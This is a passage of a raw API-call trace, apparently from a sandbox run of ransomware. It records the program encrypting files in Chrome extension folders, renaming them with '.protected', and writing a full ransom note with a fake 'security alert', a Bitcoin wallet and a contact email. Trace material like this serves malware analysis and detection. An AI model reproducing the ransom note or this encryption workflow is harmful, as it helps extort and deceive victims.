(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.548] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.548] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.548] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.548] CloseHandle (hObject=0x164) returned 1 [0081.548] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.548] lstrcmpiW (lpString1="uk", lpString2="Windows") returned -1 [0081.548] lstrcmpiW (lpString1="uk", lpString2="Program Files") returned 1 [0081.548] lstrcmpiW (lpString1="uk", lpString2="Program Files (x86)") returned 1 [0081.548] lstrcmpiW (lpString1="uk", lpString2="$Recycle.bin") returned 1 [0081.548] lstrcmpiW (lpString1="uk", lpString2="System Volume Information") returned 1 [0081.548] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk") returned 141 [0081.548] lstrcmpW (lpString1="uk", lpString2=".") returned 1 [0081.548] lstrcmpW (lpString1="uk", lpString2="..") returned 1 [0081.548] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\*") returned 143 [0081.548] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.548] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.548] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.548] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.548] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.548] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.548] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\.") returned 143 [0081.548] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.548] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.548] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.548] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.548] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.548] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.548] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.548] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\..") returned 144 [0081.548] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.548] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.549] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.549] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.549] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.549] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.549] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.549] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.549] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json") returned 155 [0081.549] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.549] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.549] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.549] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.549] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.549] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json") returned 155 [0081.549] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.549] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json") returned 155 [0081.549] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.549] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json") returned 155 [0081.549] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.549] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x130, lpOverlapped=0x0) returned 1 [0081.550] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffed0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.550] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x130, lpOverlapped=0x0) returned 1 [0081.550] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.550] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.550] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.550] CloseHandle (hObject=0x168) returned 1 [0081.550] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json.protected") returned 165 [0081.550] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json.protected")) returned 1 [0081.551] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.551] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.551] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\RESTORE_FILES.txt") returned 159 [0081.551] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.551] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.551] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.552] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.552] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.552] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.552] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.552] CloseHandle (hObject=0x164) returned 1 [0081.552] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.552] lstrcmpiW (lpString1="vi", lpString2="Windows") returned -1 [0081.552] lstrcmpiW (lpString1="vi", lpString2="Program Files") returned 1 [0081.552] lstrcmpiW (lpString1="vi", lpString2="Program Files (x86)") returned 1 [0081.552] lstrcmpiW (lpString1="vi", lpString2="$Recycle.bin") returned 1 [0081.552] lstrcmpiW (lpString1="vi", lpString2="System Volume Information") returned 1 [0081.552] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi") returned 141 [0081.552] lstrcmpW (lpString1="vi", lpString2=".") returned 1 [0081.552] lstrcmpW (lpString1="vi", lpString2="..") returned 1 [0081.552] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\*") returned 143 [0081.552] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.552] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.552] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.553] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.553] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.553] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.553] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\.") returned 143 [0081.553] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.553] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.553] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.553] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.553] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.553] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.553] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.553] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\..") returned 144 [0081.553] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.553] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.553] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.553] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.553] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.553] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.553] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.553] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.553] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json") returned 155 [0081.553] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.553] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.553] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.553] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.553] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.553] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json") returned 155 [0081.553] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.553] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json") returned 155 [0081.553] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.553] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json") returned 155 [0081.553] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.553] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe8, lpOverlapped=0x0) returned 1 [0081.554] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff18, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.554] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xe8, lpOverlapped=0x0) returned 1 [0081.554] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.554] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.554] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.555] CloseHandle (hObject=0x168) returned 1 [0081.555] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json.protected") returned 165 [0081.555] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json.protected")) returned 1 [0081.555] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.555] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.555] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\RESTORE_FILES.txt") returned 159 [0081.555] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.556] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.556] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.556] lstrlenA 